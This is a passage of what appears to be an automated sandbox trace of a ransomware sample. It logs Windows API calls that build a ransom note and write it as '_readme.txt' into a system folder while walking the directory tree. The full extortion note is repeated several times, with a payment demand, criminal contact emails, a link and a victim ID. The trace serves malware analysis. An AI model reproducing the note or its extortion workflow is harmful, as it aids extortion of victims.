and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.247] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.247] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.248] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.248] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.249] CloseHandle (hObject=0x5c8) returned 1 [0056.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.249] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.249] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.249] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 